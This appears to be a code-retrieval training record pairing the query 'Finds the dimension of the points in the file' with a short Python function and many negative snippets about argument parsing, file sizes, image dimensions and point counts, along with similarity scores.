parser.add_argument('-m', '--use-modules', nargs='+', action=\"store\", dest=\"MODULE\", type=str,\n help=\"additional modules to use\")\n\n return parser.parse_args()", "def parse_args():\n if len(sys.argv) < REQUIRED_NUM_ARGS or len(sys.argv) > MAXIMUM_NUM_ARGS:\n error_quit(\"Incorrect number of arguments!\", 400)\n # Set port to DEFAULT if not specified as an arg. Otherwise, port = portarg.\n port = sys.argv[PORT_ARG_NUM] if len(sys.argv) == MAXIMUM_NUM_ARGS else DEFAULT_FTP_PORT\n port = validate_port(port)\n # Get host address and logfile name from args.\n host, log_file = sys.argv[HOST_ARG_NUM], sys.argv[LOG_ARG_NUM]\n return host, log_file, port", "def parse_cmdline(argv):\n if argv is None:\n argv = sys.argv[1:]\n\n # initialize the parser object:\n parser = argparse.ArgumentParser(description='For each timestep, gather the energy information output by LAMMPS '\n 'in the log file.')\n parser.add_argument(\"-f\", \"--file\", help=\"The log file to be processed.\",\n default=None)\n parser.add_argument(\"-l\", \"--list_file\", help=\"The a file with a list of log files to be processes.\",\n default=None)\n args = None\n try:\n args = parser.parse_args(argv)\n if args.file is None:\n args.file_list = []\n else:\n if os.path.isfile(args.file):\n args.file_list = [args.file]\n args.source_name = args.file\n else:\n raise IOError(\"Could not find specified log file: {}\".format(args.file))\n if args.list_file is not None:\n args.file_list += file_rows_to_list(args.list_file)\n args.source_name = args.list_file\n if len(args.file_list) < 1:\n raise InvalidDataError(\"Found no log file names to process. Specify one or more files as specified in \"\n \"the help documentation ('-h').\")\n except IOError as e:\n warning(\"Problems reading file:\", e)\n parser.print_help()\n return args, IO_ERROR\n except (KeyError, InvalidDataError, SystemExit) as e:\n if hasattr(e, 'code') and e.code == 0:\n return args, GOOD_RET\n warning(e)\n parser.print_help()\n return args, INPUT_ERROR\n return args, GOOD_RET", "def parse_arguments():\n \n parser = argparse.ArgumentParser()\n parser.add_argument(\"postcode\", type=str, help=\"Postcode of current location\")\n parser.add_argument(\"-d\", \"--debug\", \n help=\"Turns on debug mode\", \n action='store_true')\n parser.add_argument(\"-fp\",\"--postcode-file\", \n default=\"postcodes_swift_sample.csv\",\n help=\"Location of Postcode CSV file (default postcodes_swift_sample.csv)\",\n type=str)\n parser.add_argument(\"-fb\",\"--pub-file\", \n default=\"pubnames_swift_sample.csv\",\n help=\"Location of Pub Postcode CSV file (default pubnames_swift_sample.csv)\",\n type=str)\n parser.add_argument(\"-l\",\"--limit\", \n default=10, \n help=\"Limit Number of Results (default 10)\",\n type=int)\n parser.add_argument(\"-m\",\"--max-distance\", \n default=50, \n help=\"Only return results less than this distance (default 50)\",\n type=int)\n return parser", "def parse_args():\n\n parser = argparse.ArgumentParser(description='CLI to store Actisense-NGT Gateway values to InfluxDB and publish via MQTT')\n parser.add_argument('--config', '-c', type=str, required=True, help='JSON configuraton file with path')\n return parser.parse_args()", "def parse_arguments():\n parser = argparse.ArgumentParser(description=\"Note: Plot depth files.\")\n parser.add_argument(\"-d\", \"--depth_dir\", help='depth file directory')\n parser.add_argument(\"-r\", \"--result_dir\", help='output directory')\n parser.add_argument(\"-f\", \"--ref\", help='one depth file as ref')\n parser.add_argument(\"-w\", \"--window_size\", help='sliding window size')\n\n args = parser.parse_args()\n return args", "def parse_args():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-t\", \"--thoughtspot_host\", required=True,\n help=\"domain or ip. E.g. http://1.1.1.1\")\n parser.add_argument(\"-u\", \"--username\", required=True,\n help=\"username - must have administrative privileges\")\n parser.add_argument(\"-p\", \"--password\", required=True,\n help=\"password - must have administrative privileges\")\n parser.add_argument(\"-d\", \"--delimiter\", default=',',\n help=\"character to seperate values by. Default to comma\")\n parser.add_argument(\"-c\", \"--csv\", action=\"store_true\",\n help=\"create csv file called permissions.csv\")\n parser.add_argument(\"-s\", \"--share\", action=\"store_true\",\n help=\"output usable format for share api\")\n return parser.parse_args()", "def _parse_args():\n parser = argparse.ArgumentParser(description=\"\")\n #parser.add_argument(\"args\", metavar=\"N\", type=str, nargs=\"*\", help=\"Positional arguments.\")\n #parser.add_argument(\"\", dest=\"\", type=\"\", default=, help=)\n #parser.add_argument(\"--version\", action=\"version\", version=\"<the version>\")\n\n return parser.parse_args()", "def _parse_args():\n usage = \"usage: %prog [options] arg1 arg2\"\n parser = optparse.OptionParser()\n parser.add_option(\n '--platform', dest='platform', default=\"\", type = \"string\",\n help='platform name: UC 360 baidu etc.')\n parser.add_option(\n '--workspace', dest='workspace', default=\"./\", type = \"string\",\n help='project directory.')\n parser.add_option(\n '--project', dest='projectDir', default=\"./destProject\", type = \"string\",\n help='project directory.')\n # parser.add_option(\n # \"-t\", dest=\"test\", action=\"store_const\", const=lambda:_test, default=_test2, help=\"////////////\"\n # )\n options, args = parser.parse_args()\n # positional arguments are ignored\n return options, args", "def parse_args():\n parser = MyParser(description='Data processing and analytics library \\\n for OpenStack Browbeat perf data')\n\n parser.add_argument('-s', '--summary', dest=\"days\", type=int, default=-1,\n help='-s N summary of last N days of results')\n\n parser.add_argument('--summary-uuid', dest=\"summary_uuid\", type=str,\n default=None,\n help='--summary-uuid UUID summary of a specific uuid')\n\n parser.add_argument('--short-summary', dest=\"short_days\", type=int,\n default=-1,\n help='--short-summary N gives \\\n summary of last N days of results but uses cockroach \\\n db so only provides with basic summary')\n\n parser.add_argument('--upload-timesummary', dest=\"timeseries_uuid\",\n type=str, default=None,\n help='--upload-timesummary UUID \\\n uploads the features computed from data obtained from\\\n graphite. ')\n\n parser.add_argument('--upload-logsummary', dest=\"loggin_uuid\",\n type=str, default=None,\n help='--upload-logsummary UUID \\\n uploads the log summary to crdb \\\n currently just summarizes over entire timeperiod. ')\n\n parser.add_argument('-u', '--update-db', dest='update', type=bool,\n default=False,\n help='-u True pushes data to cockroach db')\n\n parser.add_argument('--update-clf', dest=\"clf_days\", type=int,\n default=-1,\n help='--update-clf 60 will update all classifiers \\\n listed in config file under classifier_lists \\\n using data from last 60 days')\n\n parser.add_argument('--test-clf', dest=\"test_days\", type=int,\n default=-1,\n help='--test-clf 60 will train all classifiers \\\n listed in config file under classifier_lists \\\n using data from last 60 days and then test it \\\n and display metrics')\n\n parser.add_argument('-v', '--osp-version', dest='version', type=str,\n default=None,\n help='-v 11-tripleo only returns hits for that \\\n OpenStack version, \\\n only supported by summary right now')\n\n parser.add_argument('-c', '--config', dest='config', type=str,\n default=pkg_resources.resource_filename('bml',\n \"config.yml\"),\n help='-c <config file path> use custom config file')\n\n args = parser.parse_args()\n return args" ]
[ "0.807208", "0.74767", "0.73985106", "0.73932225", "0.73173845", "0.72599804", "0.7232453", "0.7222555", "0.713585", "0.7102058", "0.71020466", "0.7096281", "0.7093058", "0.70890576", "0.7080071", "0.70745754", "0.70641047", "0.70633066", "0.70568484", "0.7051162", "0.70484704", "0.70392704", "0.70360875", "0.70318705", "0.7027451", "0.70252234", "0.7022721", "0.7022492", "0.70170593", "0.7014263", "0.70100504", "0.7007431", "0.6994161", "0.699383", "0.6983955", "0.6983752", "0.69775766", "0.69572973", "0.69533485", "0.6947874", "0.6945031", "0.69413644", "0.6922684", "0.69203645", "0.6918339", "0.6913712", "0.69133645", "0.69080514", "0.690557", "0.69051087", "0.68935853", "0.68917054", "0.68904185", "0.6890077", "0.68900126", "0.68862873", "0.68861234", "0.6881948", "0.6877161", "0.68741214", "0.6872096", "0.6868787", "0.6868005", "0.6862433", "0.6861699", "0.68557686", "0.68520546", "0.6849977", "0.68487155", "0.6848432", "0.6847478", "0.6847275", "0.68372065", "0.68345195", "0.68323785", "0.6829461", "0.6828884", "0.6828278", "0.6821114", "0.6820864", "0.68143517", "0.68131423", "0.6812891", "0.681097", "0.6810629", "0.68098515", "0.68074393", "0.6801786", "0.67999804", "0.6798342", "0.6791417", "0.67910695", "0.6789611", "0.67888737", "0.67882013", "0.67845696", "0.6779286", "0.67742145", "0.67737764", "0.6772532", "0.6772439" ]
0.0
-1
Finds the dimension of the points in the file.
def find_dimesion(filename): file = open(filename,"r") line = file.readline() file.close() return len(line.split())
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_dimensions ( file_in, separator ) :\n try :\n logger.info ( \"Extract dimensions from xyz file \" + str(file_in) ) \n d = {}\n first_row = True\n d[NOPS] = 0\n file = open(file_in, 'r')\n for line in file :\n d[NOPS] = d[NOPS] + 1\n l = line.rstrip().split(separator)\n x = float(l[0])\n y = float(l[1])\n z = float(l[2])\n if first_row :\n d[MINX] = x\n d[MAXX] = x\n d[MINY] = y\n d[MAXY] = y\n d[MINZ] = z\n d[MAXZ] = z\n first_row = False\n else :\n if x < d[MINX] :\n d[MINX] = x\n if x > d[MAXX] :\n d[MAXX] = x \n if y < d[MINY] :\n d[MINY] = y\n if y > d[MAXY] :\n d[MAXY] = y \n if z < d[MINZ] :\n d[MINZ] = z\n if z > d[MAXZ] :\n d[MAXZ] = z \n file.close() \n logger.info ('Now return')\n return d\n except Exception, err:\n logger.critical(\"Extract dimensions from xyz file failed: ERROR: %s\\n\" % str(err))\n raise", "def GetDimensions(filename):\n with Image(filename=filename) as img:\n dimensions = (img.width, img.height)\n return(dimensions)", "def get_num_points(self):\n dimensions = self.data.shape\n return dimensions[0]", "def get_dimension(pts):\n return pts[3][0] - pts[0][0], pts[3][1] -", "def dimensions():", "def InferSpatialDimension(self):\n\n assert self.points is not None\n # if self.points.shape[1] == 3:\n # if self.element_type == \"tri\" or self.element_type == \"quad\":\n # print(\"3D surface mesh of \", self.element_type)\n\n return self.points.shape[1]", "def _get_las_npoints(fpath):\n with laspy.file.File(fpath) as f:\n return f.header.count", "def getDimensions():", "def dimension(self):\r\n a = 0\r\n for x in self.faces():\r\n if (len(x) > a):\r\n a = len(x) \r\n return a-1", "def pointsize(self):\n\treturn self.m_pointsize", "def read_off_size(path):\n try:\n with open(path, 'r') as file:\n lines = file.readlines()\n if lines[0] != 'OFF\\n':\n print(path, 'Error: is not an .off file')\n num_vertices, num_faces = tuple(lines[1].split()[:2])\n return int(num_vertices), int(num_faces)\n except IOError:\n print('Error: Failed reading file:', path)", "def loadSize(filepath):\n \n from osgeo import gdal\n \n ds = gdal.Open(filepath, 0)\n \n return ds.RasterYSize, ds.RasterXSize", "def dims(filespec, verbose=False):\n with open(filespec, \"rb\") as f:\n if f.read(4) == b\"\\x76\\x2f\\x31\\x01\": # EXR magic number\n version = np.frombuffer(f.read(4), dtype=\"<u4\")[0]\n max_strlen = 256 if (version & 0x400) else 32\n got_channels = False\n got_dims = False\n while not (got_channels and got_dims):\n attr_name = _read_string_nul(f, max_strlen)\n _ = _read_string_nul(f, max_strlen) # attr_type\n attr_size = np.frombuffer(f.read(4), dtype=\"<u4\")[0]\n if attr_name == \"channels\":\n nchan = 0\n isfloat = False\n bitdepth = 16\n while not got_channels:\n name = _read_string_nul(f, max_strlen)\n if len(name) >= 1:\n dtype = np.frombuffer(f.read(16), dtype=\"<u4\")[0]\n isfloat = isfloat or (dtype > 0)\n bitdepth = max(bitdepth, 16 if dtype == 1 else 32)\n nchan += 1\n else:\n got_channels = True\n elif attr_name == \"dataWindow\":\n box = np.frombuffer(f.read(16), dtype=\"<i4\")\n xmin, ymin, xmax, ymax = box\n width = xmax - xmin + 1\n height = ymax - ymin + 1\n got_dims = True\n else:\n _ = f.seek(attr_size, 1)\n if verbose:\n print(f\"Reading file {filespec} \", end='')\n print(f\"(w={width}, h={height}, c={nchan}, bitdepth={bitdepth})\")\n return width, height, nchan, isfloat, bitdepth\n raise RuntimeError(f\"File {filespec} is not a valid EXR file.\")", "def dimensions(self) -> typing.Tuple[int, int]:\n dimensions = self.data[2]\n dimensions = re.findall(r'(\\d+)\\s+x\\s+(\\d+)\\s+M', dimensions.replace('-', '0'))\n return dimensions[0] if dimensions else (0, 0)", "def getDimension(data):\r\n # open image for reading in binary mode\r\n\r\n # read the 2 bytes\r\n a = data[163:165]\r\n\r\n # calculate height\r\n height = (a[0] << 8) + a[1]\r\n\r\n # next 2 bytes is width\r\n a = data[165:167]\r\n\r\n # calculate width\r\n width = (a[0] << 8) + a[1]\r\n\r\n return (width, height)", "def find_size(mod):\n left = right = top = bottom = 0\n\n for line in (n for n in mod if n[0] == \"fp_line\"):\n layer = [n for n in line if n[0] == \"layer\"][0]\n if layer[1] in (\"F.CrtYd\", \"B.CrtYd\"):\n start = [n for n in line if n[0] == \"start\"][0]\n end = [n for n in line if n[0] == \"end\"][0]\n for x, y in (start[1:], end[1:]):\n x = float(x)\n y = float(y)\n left = min(x, left)\n right = max(x, right)\n top = min(y, top)\n bottom = max(y, bottom)\n\n width = right - left\n height = bottom - top\n\n left -= width * border_ratio\n right += width * border_ratio\n top -= height * border_ratio\n bottom += height * border_ratio\n\n return left, right, top, bottom", "def dimension(self):\n\t\treturn self.d", "def get_dimensions(image_path):\n with Image.open(image_path) as img:\n return img.size", "def countDataSize(self,filename):\n \n try:\n d = h5py.File(filename,'r')\n except:\n print(filename)\n return \n\n N = 0\n scan_edges = d['level2/Statistics/scan_edges'][:]\n for (start,end) in scan_edges:\n N += (end-start)//self.offsetLen * self.offsetLen\n d.close()\n\n N = N*self.Nfeeds\n\n self.chunks += [[int(self.Nsamples), int(self.Nsamples+N)]]\n self.datasizes += [int(N/self.Nfeeds)]\n self.Nsamples += int(N)", "def get_feature_size_per_file(self, f_name):\n shape = utils_classif.get_shape(os.path.join(f_name.replace('.data', '.shape')))\n return shape[1]", "def get_feature_size_per_file(self, f_name):\n shape = utils_classif.get_shape(os.path.join(f_name.replace('.data', '.shape')))\n return shape[1]", "def countDataSize(self,filename):\n \n d = h5py.File(filename,'r')\n features = d['spectrometer/features'][:]\n select = self.selectData(features.astype(float), self.ifeature, d)\n N = len(features[select])\n d.close()\n\n N = (N//self.offsetLen) * self.offsetLen\n\n N = N*self.Nfeeds\n\n self.chunks += [[int(self.Nsamples), int(self.Nsamples+N)]]\n self.datasizes += [int(N/self.Nfeeds)]\n self.Nsamples += int(N)", "def get_voxel_size(path: str) -> float:\n dcm = pydicom.dcmread(path, force=True)\n x_str, y_str = dcm.PixelSpacing\n x = Decimal(str(x_str))\n y = Decimal(str(y_str))\n z = Decimal(str(dcm.SpacingBetweenSlices))\n print(float(x * y * z))\n return float(x * y * z)", "def num_dimensions(self):\n if self.__num_dimensions__ == 0:\n # Try to get the number of dimensions from the first point or bounding box\n if len(self.points) > 0:\n self.__num_dimensions__ = len(self.points[0].coordinate)\n elif len(self.bounding_boxes) > 0:\n self.__num_dimensions__ = len(self.bounding_boxes[0].start)\n return self.__num_dimensions__", "def get_dimensions(self):\r\n x = []\r\n y = []\r\n z = []\r\n for i in self.verts:\r\n x.append(i[0])\r\n y.append(i[1])\r\n z.append(i[2])\r\n\r\n x.append(abs(min(x)))\r\n y.append(abs(min(y)))\r\n z.append(abs(min(z)))\r\n\r\n return max(x), max(y), max(z)", "def n_points(self):\n return self.points.shape[0]", "def get_num_dimensions(self):\n dimensions = self.data.shape\n return dimensions[1]", "def __len__(self) -> int:\n import h5py\n\n with h5py.File(\n os.path.join(self.root, self.data_dir, self.img_file_name), \"r\"\n ) as f:\n num_datapoints: int = f[self.split][\"pv_log\"].shape[0]\n\n return num_datapoints", "def get_dimensions(self):\n return self.lon_arr.shape", "def dimension(self) -> float:\n return self._dimensions", "def get_dimension_length(self):\n pass", "def dimension_size(self):\n return self._dim", "def N_POINTS(self) -> int:\n try:\n with self.fs.open(\n self.get_url().replace(\".\" + self.erddap.response, \".ncHeader\")\n ) as of:\n ncHeader = of.read().decode(\"utf-8\")\n lines = [line for line in ncHeader.splitlines() if \"row = \" in line][0]\n return int(lines.split(\"=\")[1].split(\";\")[0])\n except Exception:\n pass", "def image_size_from_file(filename):\n with PIL.Image.open(filename) as img:\n width, height = img.size\n return height, width", "def get_image_size(self, **kwargs):\n points = kwargs['points']\n max_val = points.max(0)\n min_val = points.min(0)\n height = np.ceil((max_val[0] - min_val[0]) * self.res_x).astype(int)\n width = np.ceil((max_val[1] - min_val[1]) * self.res_y).astype(int)\n\n return height, width", "def getPointSize(self):\n l = [point.size for point in self.points]\n if l.count(l[0]) == len(l):\n return l[0]\n else:\n raise ValueError(\"The sizes of the points must be the same otherwise it makes no sense.\")", "def xFileInfo(filename):\n delim = getDelimiter(filename)\n f = open(filename, 'r')\n reader = csv.reader(f, delimiter=delim)\n num_rows = 0\n for (row_i, row) in enumerate(reader):\n if row_i == 0: #ignore empty strings (e.g. at end of row)\n num_cols = len([val for val in row if val])\n num_rows += 1\n f.close()\n return (num_rows, num_cols)", "def get_data_dimensions(self):\n return image_utils.convert_shape_indexing(self._get_data_dimensions_rc(),\"rc\",self.image_indexing)", "def data_info(data):\n filename = data[\"filename\"]\n X_var = data[\"X_var\"]\n Y_var = data[\"Y_var\"]\n X,Y = read_file(filename,X_var,Y_var)\n input_dim = len(X_var)\n output_dim = len(Y_var)\n return X,Y,input_dim,output_dim", "def ndim(self):\n return len(self.point)", "def getPDBDimensions(pdbfile):\n\tf = open(pdbfile, \"r\")\n\tlimits = numpy.array([100,100,100,-100,-100,-100], dtype=numpy.float32)\n\tcount = 0\n\tfor line in f:\n\t\t### only look at atom lines\n\t\tif line.startswith(\"ATOM \") or line.startswith(\"HETATM\"):\n\t\t\tcount += 1\n\t\t\tx = float(line[30:38])\n\t\t\ty = float(line[38:46])\n\t\t\tz = float(line[46:54])\n\t\t\t## x limits\n\t\t\tif x < limits[0]:\n\t\t\t\tlimits[0] = x\n\t\t\telif x > limits[3]:\n\t\t\t\tlimits[3] = x\n\t\t\t## y limits\n\t\t\tif y < limits[1]:\n\t\t\t\tlimits[1] = y\n\t\t\telif y > limits[4]:\n\t\t\t\tlimits[4] = y\n\t\t\t## z limits\n\t\t\tif z < limits[2]:\n\t\t\t\tlimits[2] = z\n\t\t\telif z > limits[5]:\n\t\t\t\tlimits[5] = z\n\tf.close()\n\tif count == 0:\n\t\tapDisplay.printError(\"No atoms were found in PDB file\")\n\tapDisplay.printMsg(\"Found %d atoms in PDB file\"%(count))\n\tapDisplay.printMsg(\"x limits: %.2f - %.2f = %.2f\"%(limits[3],limits[0],limits[3]-limits[0]))\n\tapDisplay.printMsg(\"y limits: %.2f - %.2f = %.2f\"%(limits[4],limits[1],limits[4]-limits[1]))\n\tapDisplay.printMsg(\"z limits: %.2f - %.2f = %.2f\"%(limits[5],limits[2],limits[5]-limits[2]))\n\tlimitsize = max(limits[3]-limits[0], limits[4]-limits[1], limits[5]-limits[2])\n\treturn limitsize", "def get_dim(self, name):\n return len(self.root_group.dimensions[name])", "def _get_dimensions(self):\n corners = []\n for module in self.modules:\n for tile in module:\n corners.append(tile.corners())\n corners = np.concatenate(corners)[:, :2] / self._pixel_shape\n\n # Find extremes, add 1 px margin to allow for rounding errors\n min_xy = corners.min(axis=0).astype(int) - 1\n max_xy = corners.max(axis=0).astype(int) + 1\n\n size = max_xy - min_xy\n centre = -min_xy\n # Switch xy -> yx\n return tuple(size[::-1]), centre[::-1]", "def getNumDimensions(self):\n return len(self.di.keys())", "def dimension(self):", "def findFLength(filename):\n f = os.popen('wc -l < {}'.format(filename))\n return int(f.read())", "def dimensions(self) -> int:\n return pulumi.get(self, \"dimensions\")", "def n_points(self):\n\n if self.data_reduced:\n return len(self.data_reduced[0])\n else:\n return 0", "def _get_diameter(self,filename,maxLen=3):\n filename = os.path.splitext(filename)[0] \n filename = os.path.split(filename)[1] \n filename = filename.split(\"_\",3)[2] \n diameter = filename \n return diameter", "def nr_points(self):\n return len(self.x)", "def dataDimensions(data):\n logging.info('Number of rows of data: %s' % len(data))\n logging.info('Number of columns of data: %s' % len(data[1]))", "def GetNumberOfPoints(self):\n return self.GetNumberOfElements(ArrayAssociation.POINT)", "def get_dimensions(self):\n x = max(self.bodies, key=lambda p: p.position[0]).position[0]\n y = max(self.bodies, key=lambda p: p.position[1]).position[1]\n return max(x, y) * 1.2", "def dimension(self):\n return self._dim", "def read_image_size(file_name):\n return Image.open(file_name).size", "def getDimensions(self):\n\t\tprint \"Returning\",self.x,self.y,self.slicesPerTimepoint\n\t\treturn (self.x, self.y, self.slicesPerTimepoint)", "def _get_dimensions(self):\n corners = []\n for module in self.modules:\n for tile in module:\n corners.append(tile.corner_idx)\n corners.append(tile.opp_corner_idx)\n corners = np.stack(corners)\n\n # Find extremes\n min_yx = corners.min(axis=0)\n max_yx = corners.max(axis=0)\n\n size = max_yx - min_yx\n centre = -min_yx\n return tuple(size), centre", "def dimension(self) -> int:\n return self.options.dimension", "def num_data_lines(filepath):\n\tif not file_exists(filepath):\n\t\treturn -1\n\tcount = 0\n\twith open(filepath, 'r') as f:\n\t\twhile read_floats(f):\n\t\t\tcount += 1\n\tf.close()\n\treturn count", "def spatial_dimension(self):\r\n pass", "def fill_points_list(filename):\n f = open(input_file_test(filename), \"r\")\n\n dimension = find_dimesion(filename)\n points = list()\n line_count = 1\n flag = False\n for line in f:\n current_point = line.split()\n\n if dimension == len(current_point):\n check_if_number(current_point)\n point = Point(points=current_point, line=line_count)\n points.append(point)\n\n line_count += 1\n else:\n flag=True\n break\n\n if flag:\n print PointError()\n sys.exit()\n\n if len(points) ==1:\n print NotEnoughPointError()\n sys.exit()\n\n f.close()\n\n return points", "def dimension(self):\n return self.__N", "def size(self):\n\t\treturn self.dims", "def get_dimensions(self, variable):\n try:\n var_dimension = self.dataset[variable].dims\n return var_dimension\n except:\n print(\"Error Occurred: No Dimensions detected... Exiting. \")\n exit()", "def getDimensions(self):\n return _libsbml.Layout_getDimensions(self)", "def dimension_count(self):\n return self._dimensionCount", "def dimension(self):\n return self._dimension", "def dimension(self):\n return self._dimension", "def dimension(self):\n return self._dimension", "def dimension(self):\n return self._dimension", "def get_size(fname):\n return os.path.getsize(fname)", "def dimension(self):\n return 3*self.genus - 3 + self.n", "def get_lengths(filename, means, stds):\n\n with open(filename, 'rt') as f:\n for line in f:\n \n if line.startswith('Spring EE distance'):\n\n line = next(f)\n means.append(float(line.split()[0]))\n stds.append(float(line.split()[1]))\n break\n\n else:\n raise EOFError('No spring EE distance found')", "def size(path):", "def numpoints(self):\n return len(self.pars) + 1 # so dof is 1", "def GetSize(filename):\n return os.path.getsize(filename)", "def get_size(self):\n lines = len(self.coefficients)\n columns = 0 if lines == 0 else len(self.coefficients[0])\n return lines, columns", "def countSamples(filename):\n with open(filename, \"r\") as f:\n line = f.readline().split(\"\\t\")\n return len(line) - 2", "def count_triangles(self, file):\n self.nibble(80)\n return struct.unpack(\"@i\", self.nibble(4))[0]", "def get_files_size_and_line_number(file_path, file_format):\n logging.info(\"[get_file_size_and_line_number] file_path: %s, file_format: %s\", file_path, file_format)\n size = 0\n lines = 0\n for root, dirs, files in os.walk(file_path):\n for file in files:\n for one_format in file_format:\n if file.endswith(one_format):\n size += os.path.getsize(os.path.join(root, file))\n lines += get_file_lines(os.path.join(root, file))\n return size, lines", "def video_dimensions(filename):\n\n probe = ffmpeg.probe(filename)\n\n video_stream = next((stream for stream in probe['streams']\n if stream['codec_type'] == 'video'), None)\n\n width = int(video_stream['width'])\n height = int(video_stream['height'])\n\n return width, height", "def get_size(filename):\n fileinfo = os.stat(filename)\n return fileinfo", "def _get_observation_dimension(self):\n return len(self._get_observation_np())", "def dims(self) -> tuple[str, str]:\n # if self.dim0 is not None:\n return self.y_dim, self.x_dim", "def getDimensions(self):\n return _libsbml.BoundingBox_getDimensions(self)", "def get_dimensions(image, classname):\n start, ext = os.path.splitext(image)\n if ext == '.yuv':\n bitdepth = \"8\"\n res_split = start.split('x')\n width_split = res_split[0].split('_')\n width = width_split[-1]\n height_split = res_split[-1].split('_')\n m = res_split[-1].find(\"bit\")\n if res_split[-1][m - 2] == \"_\":\n depth = res_split[-1][m - 1]\n else:\n depth = res_split[-1][m - 2:m]\n height = height_split[0]\n elif classname == \"classE_exr\":\n size = os.path.basename(image).split('_')[2]\n try:\n dimension_cmd = [\"identify\", '-size', size, '-format', '%w,%h,%z', image]\n width, height, depth = subprocess.check_output(dimension_cmd).split(\",\")\n except subprocess.CalledProcessError as e:\n print dimension_cmd, e.output\n else:\n try:\n dimension_cmd = [\"identify\", '-format', '%w,%h,%z', image]\n width, height, depth = subprocess.check_output(dimension_cmd).split(\",\")\n except subprocess.CalledProcessError as e:\n print dimension_cmd, e.output\n return width, height, depth", "def get_array_size():\n tg_file = 'NA_CAS_gauges.txt'\n lines = open(tg_file).readlines()\n tg_nbr = len(lines)\n return tg_nbr", "def GetPixelDimensions(self):\n _, width, _, _, _, height = self.GetGeoTransform()\n return XY(x=width, y=height)", "def numPixels(self):\n\t\treturn self.size", "def numPixels(self):\n\t\treturn self.size", "def getFileSize(filename):\n\tfilename = adaptPath(filename)\n\tfrom os import stat\n\tfrom stat import ST_SIZE\n\treturn stat(filename)[ST_SIZE]", "def get_image_size(file_name):\r\n return Image.open(file_name).size", "def findWidthHeight():\n\n for f in os.listdir(\"%s/train/images/\" % args.dataset):\n if f.endswith(\".jpeg\"):\n imf = \"%s/train/images/%s\" % (args.dataset, f)\n try:\n im = Image.open(imf)\n except:\n print \"Could not open training image %s to read its size.\" %imf\n usage()\n break\n \n width = int(im.size[0])\n height = int(im.size[1])\n \n nwidth = width\n nheight = height\n if args.width:\n nwidth = args.width\n if args.height:\n nheight = args.height\n\n return width, height, nwidth, nheight, not(width == nwidth and height == nheight)", "def count_positions(fname):\r\n with open(fname) as f:\r\n for i, l in enumerate(f):\r\n pass\r\n return i + 1", "def _get_image_dimensions(self):\n\t\timageWidth = int(self.labels['IMAGE']['LINE_SAMPLES'])\n\t\timageHeight = int(self.labels['IMAGE']['LINES'])\n\t\treturn imageWidth, imageHeight", "def get_points_number(self):\n ncontour = self.get_contours_number\n npoints = []\n for i in range(0, ncontour):\n npoints.append(len(self.x[i]))\n return npoints", "def get_dimensions(view: View, path: str):\n\n # Allow max automatic detection and remove gutter\n max_width, max_height = view.viewport_extent()\n max_width *= 0.75\n max_height *= 0.75\n max_ratio = max_height / max_width\n\n # Get image dimensions\n try:\n width, height, _ = get_image_size(path)\n except UnknownImageFormat:\n return -1, -1\n\n # First check height since it's the smallest vector\n if height / width >= max_ratio and height > max_height:\n ratio = max_height / height\n width *= ratio\n height *= ratio\n elif height / width <= max_ratio and width > max_width:\n ratio = max_width / width\n width *= ratio\n height *= ratio\n\n return width, height", "def length(self):\n mmap = self.memmap;\n self.memmap = 'r';\n data = self.load();\n self.memmap = mmap;\n return data.shape[0];", "def dimensions(self, varname):\n if self.handle == None: return None\n try:\n var = self.handle.variables[varname]\n except KeyError:\n return None\n return var.dimensions", "def size_in(self):\n return self.dimensions" ]
[ "0.6812365", "0.6810448", "0.68029106", "0.6689416", "0.6590357", "0.6507463", "0.64789444", "0.6432954", "0.6427297", "0.63916624", "0.6285233", "0.6277324", "0.62739605", "0.6271587", "0.6249749", "0.6227997", "0.621909", "0.6207011", "0.6204155", "0.6199409", "0.6199409", "0.61801225", "0.61609286", "0.61522937", "0.6140296", "0.6136657", "0.6130958", "0.61279804", "0.6104406", "0.6075339", "0.607509", "0.6068107", "0.60609204", "0.6035447", "0.60301054", "0.6030032", "0.60111403", "0.59867936", "0.5963428", "0.5963072", "0.59513575", "0.59488904", "0.5941695", "0.59353644", "0.59270036", "0.5922135", "0.5909037", "0.59045297", "0.5896305", "0.5886292", "0.5885377", "0.5885132", "0.58845794", "0.5865483", "0.5853475", "0.5851315", "0.5848203", "0.58417594", "0.583994", "0.58337116", "0.58316714", "0.58006984", "0.57963914", "0.5794602", "0.5794154", "0.5793213", "0.578388", "0.578388", "0.578388", "0.578388", "0.5775742", "0.57640034", "0.5763424", "0.5743422", "0.57331914", "0.57310194", "0.57288766", "0.57280755", "0.5724932", "0.5724254", "0.5719392", "0.5713032", "0.57056427", "0.57029116", "0.5695101", "0.56891054", "0.5688601", "0.56879044", "0.5686284", "0.5686284", "0.56836104", "0.56804377", "0.5677087", "0.56730783", "0.56725425", "0.56616384", "0.56498945", "0.5644427", "0.564202", "0.5637194" ]
0.6965317
0
Fills the list of points to be used.
def fill_points_list(filename): f = open(input_file_test(filename), "r") dimension = find_dimesion(filename) points = list() line_count = 1 flag = False for line in f: current_point = line.split() if dimension == len(current_point): check_if_number(current_point) point = Point(points=current_point, line=line_count) points.append(point) line_count += 1 else: flag=True break if flag: print PointError() sys.exit() if len(points) ==1: print NotEnoughPointError() sys.exit() f.close() return points
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def refresh(self):\n self._list_of_points = []\n self._add_points()", "def fill_step(self):\n while len(self.x_values) < self.num_points\n x_step = self.get_step()\n y_step = self.get_step()\n if x_step == 0 and y_step == 0:\n continue\n next_x = self.x_values[-1] x x_step\n next_y = self.y_values[-1] + y_step\n self.x_values.append(next_x)\n self.y_values.append(next_y)", "def setPointFill(self, fill):\n for point in self.points:\n point.fill = fill", "def fill_vectors(self):\n # use random numbers for generating plot data:\n random.seed(9) # fix the seed for testing\n for index in range(self.npoints):\n self.vector_x.append(index) # x coordinates\n for y in range(self.ncurves):\n self.vector_y[y].append(random.uniform(0,8))", "def pointsSetUp(self):\r\n self.background.draw(self.surface)\r\n for i in range(len(self.points)):\r\n self.points[i].organize()\r\n self.points[i].update()\r\n self.points[i].addNumber(i)\r\n self.points[i].setActiveTurn()", "def _add_points(self):\n if not '_list_of_points' in self.__dict__.keys():\n self._list_of_points = [] \n for point in self['point'].items():\n self._list_of_points.append(point[1])", "def fill(self, products):\n unplaced = []\n self.x = 0\n for p in products:\n if self.x + p.width < Cage.width:\n p.location = self.x, self.y, self.z\n self.placed_products.append(p)\n self.x += p.width\n else:\n unplaced.append(p)\n return unplaced", "def fill_walk(self):\n\n # keep walking until walk reaches desired length\n while len(self.x_values) < 